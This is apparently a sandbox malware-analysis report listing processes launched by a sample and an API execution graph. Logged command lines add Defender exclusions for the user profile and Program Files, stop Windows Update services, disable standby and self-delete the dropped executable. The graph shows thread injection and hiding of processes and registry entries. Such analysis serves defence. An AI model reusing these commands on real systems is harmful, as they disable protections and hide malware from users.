                                                                                                    Imagebase:0x7ff661590000
                                                                                                    File size:944'128 bytes
                                                                                                    MD5 hash:A987B43E6A8E8F894B98A3DF022DB518
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    Target ID:25
                                                                                                    Start time:10:29:57
                                                                                                    Start date:09/10/2024
                                                                                                    Path:C:\Windows\System32\powercfg.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:powercfg /x -standby-timeout-ac 0
                                                                                                    Imagebase:0x7ff6f0da0000
                                                                                                    File size:96'256 bytes
                                                                                                    MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:26
                                                                                                    Start time:10:29:57
                                                                                                    Start date:09/10/2024
                                                                                                    Path:C:\Windows\System32\powercfg.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:powercfg /x -standby-timeout-dc 0
                                                                                                    Imagebase:0x7ff6f0da0000
                                                                                                    File size:96'256 bytes
                                                                                                    MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:27
                                                                                                    Start time:10:29:57
                                                                                                    Start date:09/10/2024
                                                                                                    Path:C:\Windows\System32\lsass.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\lsass.exe
                                                                                                    Imagebase:0x7ff618e70000
                                                                                                    File size:59'448 bytes
                                                                                                    MD5 hash:15A556DEF233F112D127025AB51AC2D3
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    Target ID:28
                                                                                                    Start time:10:29:58
                                                                                                    Start date:09/10/2024
                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
                                                                                                    Imagebase:0x7ff6d52a0000
                                                                                                    File size:57'360 bytes
                                                                                                    MD5 hash:F586835082F632DC8D9404D83BC16316
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    Target ID:29
                                                                                                    Start time:10:29:58
                                                                                                    Start date:09/10/2024
                                                                                                    Path:C:\Windows\System32\dwm.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"dwm.exe"
                                                                                                    Imagebase:0x7ff7994b0000
                                                                                                    File size:94'720 bytes
                                                                                                    MD5 hash:5C27608411832C5B39BA04E33D53536C
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    Target ID:30
                                                                                                    Start time:10:30:03
                                                                                                    Start date:09/10/2024
                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                                                                                                    Imagebase:0x7ff6d52a0000
                                                                                                    File size:57'360 bytes
                                                                                                    MD5 hash:F586835082F632DC8D9404D83BC16316
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    Target ID:31
                                                                                                    Start time:10:30:04
                                                                                                    Start date:09/10/2024
                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                                                                    Imagebase:0x7ff6d52a0000
                                                                                                    File size:57'360 bytes
                                                                                                    MD5 hash:F586835082F632DC8D9404D83BC16316
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    Target ID:32
                                                                                                    Start time:10:30:04
                                                                                                    Start date:09/10/2024
                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                                                                                                    Imagebase:0x7ff6d52a0000
                                                                                                    File size:57'360 bytes
                                                                                                    MD5 hash:F586835082F632DC8D9404D83BC16316
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    Target ID:35
                                                                                                    Start time:10:30:05
                                                                                                    Start date:09/10/2024
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe"
                                                                                                    Imagebase:0x7ff7e5d60000
                                                                                                    File size:289'792 bytes
                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:36
                                                                                                    Start time:10:30:05
                                                                                                    Start date:09/10/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff6a42c0000
                                                                                                    File size:875'008 bytes
                                                                                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:37
                                                                                                    Start time:10:30:05
                                                                                                    Start date:09/10/2024
                                                                                                    Path:C:\Program Files\Google\Chrome\updater.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Program Files\Google\Chrome\updater.exe"
                                                                                                    Imagebase:0x140000000
                                                                                                    File size:20'970'496 bytes
                                                                                                    MD5 hash:413E4E7BC129E8165D1FFD2B1AE5DB04
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Antivirus matches:
                                                                                                    • Detection: 29%, ReversingLabs
                                                                                                    Has exited:true

                                                                                                    Target ID:38
                                                                                                    Start time:10:30:05
                                                                                                    Start date:09/10/2024
                                                                                                    Path:C:\Windows\System32\choice.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:choice /C Y /N /D Y /T 3
                                                                                                    Imagebase:0x7ff774650000
                                                                                                    File size:35'840 bytes
                                                                                                    MD5 hash:1A9804F0C374283B094E9E55DC5EE128
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:39
                                                                                                    Start time:10:30:05
                                                                                                    Start date:09/10/2024
                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                                                                                                    Imagebase:0x7ff6d52a0000
                                                                                                    File size:57'360 bytes
                                                                                                    MD5 hash:F586835082F632DC8D9404D83BC16316
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    Target ID:40
                                                                                                    Start time:10:30:06
                                                                                                    Start date:09/10/2024
                                                                                                    Path:C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHDCPSvc.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHDCPSvc.exe
                                                                                                    Imagebase:0x7ff6190e0000
                                                                                                    File size:365'360 bytes
                                                                                                    MD5 hash:B6BAD2BD8596D9101874E9042B8E2D63
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    Target ID:41
                                                                                                    Start time:10:30:06
                                                                                                    Start date:09/10/2024
                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                                                                                    Imagebase:0x7ff6d52a0000
                                                                                                    File size:57'360 bytes
                                                                                                    MD5 hash:F586835082F632DC8D9404D83BC16316
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    Target ID:42
                                                                                                    Start time:10:30:07
                                                                                                    Start date:09/10/2024
                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                                                                                    Imagebase:0x7ff6d52a0000
                                                                                                    File size:57'360 bytes
                                                                                                    MD5 hash:F586835082F632DC8D9404D83BC16316
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    Target ID:43
                                                                                                    Start time:10:30:07
                                                                                                    Start date:09/10/2024
                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                                                                                                    Imagebase:0x7ff6d52a0000
                                                                                                    File size:57'360 bytes
                                                                                                    MD5 hash:F586835082F632DC8D9404D83BC16316
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    Target ID:44
                                                                                                    Start time:10:30:08
                                                                                                    Start date:09/10/2024
                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                                                                                    Imagebase:0x7ff695fe0000
                                                                                                    File size:452'608 bytes
                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:45
                                                                                                    Start time:10:30:08
                                                                                                    Start date:09/10/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff6a42c0000
                                                                                                    File size:875'008 bytes
                                                                                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:46
                                                                                                    Start time:10:30:08
                                                                                                    Start date:09/10/2024
                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                                                                                    Imagebase:0x7ff6d52a0000
                                                                                                    File size:57'360 bytes
                                                                                                    MD5 hash:F586835082F632DC8D9404D83BC16316
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    Target ID:47
                                                                                                    Start time:10:30:09
                                                                                                    Start date:09/10/2024
                                                                                                    Path:C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHeciSvc.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHeciSvc.exe
                                                                                                    Imagebase:0x7ff6e6ea0000
                                                                                                    File size:521'536 bytes
                                                                                                    MD5 hash:3B0DF35583675DE5A08E8D4C1271CEC0
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    Target ID:48
                                                                                                    Start time:10:30:10
                                                                                                    Start date:09/10/2024
                                                                                                    Path:C:\Windows\System32\DriverStore\FileRepository\cui_dch.inf_amd64_2e49f48165b8de10\igfxCUIService.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\System32\DriverStore\FileRepository\cui_dch.inf_amd64_2e49f48165b8de10\igfxCUIService.exe
                                                                                                    Imagebase:0x7ff711120000
                                                                                                    File size:399'664 bytes
                                                                                                    MD5 hash:91038D45A86B5465E8B7E5CD63187150
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    Target ID:49
                                                                                                    Start time:10:30:10
                                                                                                    Start date:09/10/2024
                                                                                                    Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                    Imagebase:0x7ff7bed40000
                                                                                                    File size:496'640 bytes
                                                                                                    MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    Target ID:50
                                                                                                    Start time:10:30:10
                                                                                                    Start date:09/10/2024
                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                                                                                                    Imagebase:0x7ff6d52a0000
                                                                                                    File size:57'360 bytes
                                                                                                    MD5 hash:F586835082F632DC8D9404D83BC16316
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    Target ID:51
                                                                                                    Start time:10:30:11
                                                                                                    Start date:09/10/2024
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
                                                                                                    Imagebase:0x7ff7e5d60000
                                                                                                    File size:289'792 bytes
                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:52
                                                                                                    Start time:10:30:11
                                                                                                    Start date:09/10/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff6a42c0000
                                                                                                    File size:875'008 bytes
                                                                                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:53
                                                                                                    Start time:10:30:11
                                                                                                    Start date:09/10/2024
                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                                                                                    Imagebase:0x7ff6d52a0000
                                                                                                    File size:57'360 bytes
                                                                                                    MD5 hash:F586835082F632DC8D9404D83BC16316
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    Target ID:54
                                                                                                    Start time:10:30:11
                                                                                                    Start date:09/10/2024
                                                                                                    Path:C:\Windows\System32\sc.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:sc stop UsoSvc
                                                                                                    Imagebase:0x7ff7fa3b0000
                                                                                                    File size:72'192 bytes
                                                                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:55
                                                                                                    Start time:10:30:11
                                                                                                    Start date:09/10/2024
                                                                                                    Path:C:\Windows\System32\sc.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:sc stop WaaSMedicSvc
                                                                                                    Imagebase:0x7ff7fa3b0000
                                                                                                    File size:72'192 bytes
                                                                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:56
                                                                                                    Start time:10:30:11
                                                                                                    Start date:09/10/2024
                                                                                                    Path:C:\Windows\System32\sc.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:sc stop wuauserv
                                                                                                    Imagebase:0x7ff731b80000
                                                                                                    File size:72'192 bytes
                                                                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:57
                                                                                                    Start time:10:30:11
                                                                                                    Start date:09/10/2024
                                                                                                    Path:C:\Windows\System32\sc.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:sc stop bits
                                                                                                    Imagebase:0x7ff7fa3b0000
                                                                                                    File size:72'192 bytes
                                                                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Reset < >

                                                                                                      Execution Graph

                                                                                                      Execution Coverage:10.3%
                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                      Signature Coverage:46%
                                                                                                      Total number of Nodes:87
                                                                                                      Total number of Limit Nodes:15
                                                                                                      execution_graph 37469 125d4013b99 37471 125d4013ae6 37469->37471 37470 125d4013b36 VirtualQuery 37470->37471 37474 125d4013b50 37470->37474 37471->37470 37472 125d4013b6a VirtualAlloc 37471->37472 37471->37474 37473 125d4013b9b GetLastError 37472->37473 37472->37474 37473->37471 37473->37474 37485 125d40121cc NtQuerySystemInformation 37486 125d4012208 37485->37486 37487 125d40122e8 37486->37487 37488 125d401231d 37486->37488 37494 125d4012221 37486->37494 37489 125d4012322 37488->37489 37490 125d4012391 37488->37490 37497 125d40130b4 GetProcessHeap RtlAllocateHeap NtQuerySystemInformation 37489->37497 37490->37487 37493 125d40130b4 12 API calls 37490->37493 37492 125d4012263 StrCmpNIW 37492->37494 37493->37487 37494->37487 37494->37492 37496 125d4011d60 6 API calls 37494->37496 37496->37494 37498 125d40131d1 GetProcessHeap HeapFree 37497->37498 37501 125d401310f 37497->37501 37498->37487 37499 125d40131cc 37499->37498 37500 125d401315e StrCmpNIW 37500->37501 37501->37499 37501->37500 37503 125d4011d60 6 API calls 37501->37503 37503->37501 37528 125d4012cdc NtDeviceIoControlFile 37529 125d4012d5b 37528->37529 37530 125d4013090 37528->37530 37529->37530 37531 125d4012d79 GetModuleHandleA 37529->37531 37532 125d4012d8b GetProcAddress 37531->37532 37533 125d4012d9d 37531->37533 37532->37533 37533->37530 37534 125d4012dc4 StrCmpNIW 37533->37534 37534->37530 37538 125d4012de9 37534->37538 37535 125d4011a14 6 API calls 37535->37538 37536 125d4012efb lstrlenW 37536->37538 37537 125d4012fb5 lstrlenW 37537->37538 37538->37530 37538->37535 37538->37536 37538->37537 37539 125d4013930 StrCmpNIW 37538->37539 37540 125d4011554 StrCmpIW StrCmpW 37538->37540 37539->37538 37540->37538 37553 125d4012a7c NtEnumerateValueKey 37554 125d4012b20 37553->37554 37557 125d4012ac7 37553->37557 37555 125d4012ad4 NtEnumerateValueKey 37555->37557 37557->37554 37557->37555 37558 125d4013930 37557->37558 37559 125d4013952 37558->37559 37560 125d401393d StrCmpNIW 37558->37560 37559->37557 37560->37559 37561 7ff95a54c3ec 37562 7ff95a54c3ff CreateToolhelp32Snapshot 37561->37562 37564 7ff95a54c493 37562->37564 37475 125d401562d 37476 125d4015634 37475->37476 37477 125d401569b 37476->37477 37478 125d4015717 VirtualProtect 37476->37478 37479 125d4015751 37478->37479 37480 125d4015743 GetLastError 37478->37480 37480->37479 37504 125d4015dd0 37505 125d4015ddd 37504->37505 37506 125d4015de9 37505->37506 37512 125d4015efa 37505->37512 37507 125d4015e1e 37506->37507 37508 125d4015e6d 37506->37508 37509 125d4015e46 SetThreadContext 37507->37509 37509->37508 37510 125d4015fde 37513 125d4015ffe 37510->37513 37526 125d40144c0 VirtualFree 37510->37526 37511 125d4015f21 VirtualProtect FlushInstructionCache 37511->37512 37512->37510 37512->37511 37522 125d4014ed0 GetCurrentProcess 37513->37522 37516 125d4016003 37517 125d4016057 37516->37517 37518 125d4016017 ResumeThread 37516->37518 37527 125d4017a20 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 37517->37527 37519 125d401604b 37518->37519 37519->37516 37521 125d401609f 37523 125d4014eec 37522->37523 37524 125d4014f02 VirtualProtect FlushInstructionCache 37523->37524 37525 125d4014f33 37523->37525 37524->37523 37525->37516 37526->37513 37527->37521 37541 125d40123f0 GetProcessIdOfThread GetCurrentProcessId 37542 125d40124be NtResumeThread 37541->37542 37543 125d4012421 37541->37543 37548 125d40119ac OpenProcess IsWow64Process CloseHandle 37543->37548 37545 125d401242b 37545->37542 37546 125d4012433 CreateFileW 37545->37546 37546->37542 37547 125d4012477 WriteFile ReadFile CloseHandle 37546->37547 37547->37542 37548->37545 37481 7ff95a54c721 37482 7ff95a54c727 37481->37482 37483 7ff95a54c7b5 Process32First 37482->37483 37484 7ff95a54c7c1 37482->37484 37483->37484 37549 125d36c2908 37550 125d36c2936 37549->37550 37551 125d36c2994 VirtualAlloc 37550->37551 37552 125d36c29b8 37550->37552 37551->37552

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 0 125d4012cdc-125d4012d55 NtDeviceIoControlFile 1 125d4012d5b-125d4012d61 0->1 2 125d4013090-125d40130b3 0->2 1->2 3 125d4012d67-125d4012d6a 1->3 3->2 4 125d4012d70-125d4012d73 3->4 4->2 5 125d4012d79-125d4012d89 GetModuleHandleA 4->5 6 125d4012d8b-125d4012d9b GetProcAddress 5->6 7 125d4012d9d 5->7 8 125d4012da0-125d4012dbe 6->8 7->8 8->2 10 125d4012dc4-125d4012de3 StrCmpNIW 8->10 10->2 11 125d4012de9-125d4012ded 10->11 11->2 12 125d4012df3-125d4012dfd 11->12 12->2 13 125d4012e03-125d4012e0a 12->13 13->2 14 125d4012e10-125d4012e23 13->14 15 125d4012e25-125d4012e31 14->15 16 125d4012e33 14->16 17 125d4012e36-125d4012e3a 15->17 16->17 18 125d4012e4a 17->18 19 125d4012e3c-125d4012e48 17->19 20 125d4012e4d-125d4012e57 18->20 19->20 21 125d4012f4d-125d4012f51 20->21 22 125d4012e5d-125d4012e60 20->22 23 125d4012f57-125d4012f5a 21->23 24 125d4013082-125d401308a 21->24 25 125d4012e72-125d4012e7c 22->25 26 125d4012e62-125d4012e6f call 125d4011a14 22->26 27 125d4012f5c-125d4012f68 call 125d4011a14 23->27 28 125d4012f6b-125d4012f75 23->28 24->2 24->14 30 125d4012e7e-125d4012e8b 25->30 31 125d4012eb0-125d4012eba 25->31 26->25 27->28 35 125d4012fa5-125d4012fa8 28->35 36 125d4012f77-125d4012f84 28->36 30->31 38 125d4012e8d-125d4012e9a 30->38 32 125d4012eea-125d4012eed 31->32 33 125d4012ebc-125d4012ec9 31->33 40 125d4012efb-125d4012f08 lstrlenW 32->40 41 125d4012eef-125d4012ef9 call 125d4011d28 32->41 33->32 39 125d4012ecb-125d4012ed8 33->39 44 125d4012fb5-125d4012fc2 lstrlenW 35->44 45 125d4012faa-125d4012fb3 call 125d4011d28 35->45 36->35 43 125d4012f86-125d4012f93 36->43 46 125d4012e9d-125d4012ea3 38->46 51 125d4012edb-125d4012ee1 39->51 53 125d4012f0a-125d4012f14 40->53 54 125d4012f2b-125d4012f3d call 125d4013930 40->54 41->40 48 125d4012f43-125d4012f48 41->48 55 125d4012f96-125d4012f9c 43->55 49 125d4012fe5-125d4012fef call 125d4013930 44->49 50 125d4012fc4-125d4012fce 44->50 45->44 65 125d4012ffa-125d4013005 45->65 47 125d4012ea9-125d4012eae 46->47 46->48 47->31 47->46 59 125d4012ff2-125d4012ff4 48->59 49->59 50->49 60 125d4012fd0-125d4012fe3 call 125d4011554 50->60 51->48 61 125d4012ee3-125d4012ee8 51->61 53->54 64 125d4012f16-125d4012f29 call 125d4011554 53->64 54->48 54->59 55->65 66 125d4012f9e-125d4012fa3 55->66 59->24 59->65 60->49 60->65 61->32 61->51 64->48 64->54 70 125d4013007-125d401300b 65->70 71 125d401307c-125d4013080 65->71 66->35 66->55 74 125d401300d-125d4013011 70->74 75 125d4013013-125d401302d call 125d40186a0 70->75 71->24 74->75 77 125d4013030-125d4013033 74->77 75->77 79 125d4013056-125d4013059 77->79 80 125d4013035-125d4013053 call 125d40186a0 77->80 79->71 83 125d401305b-125d4013079 call 125d40186a0 79->83 80->79 83->71
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.11926716823.00000125D4010000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000125D4010000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D402A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D402C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D4035000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_125d4010000_zufmUwylvo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Filelstrlen$HandleModuleName$AddressCloseControlDeviceFindOpenPathProcProcess
                                                                                                      • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                                                      • API String ID: 1201441540-3850299575
                                                                                                      • Opcode ID: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
                                                                                                      • Instruction ID: a798f0d261e512d238e339c324b3d4e172a738115e7c3c4c9897d560935a9e69
                                                                                                      • Opcode Fuzzy Hash: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
                                                                                                      • Instruction Fuzzy Hash: 1DB1AE32212E9882FB599FA5D4D07F96BA6F744B84F94502AEE09AB794DF35CC60C340

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.11926716823.00000125D4010000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000125D4010000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D402A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D402C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.11926716823.00000125D4035000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_125d4010000_zufmUwylvo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Process$File$CloseHandleThread$CreateCurrentOpenReadResumeWow64Write
                                                                                                      • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                                                                      • API String ID: 2222519123-1373409510
                                                                                                      • Opcode ID: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
                                                                                                      • Instruction ID: b474440931993bcaf41c8731280be646a53f0584e153a076b225260281b40078
                                                                                                      • Opcode Fuzzy Hash: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
                                                                                                      • Instruction Fuzzy Hash: 49214135614B4893F7108B65F4D43EA7BA6F789BA4F904215DA594ABE8CF3CC159CF00

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
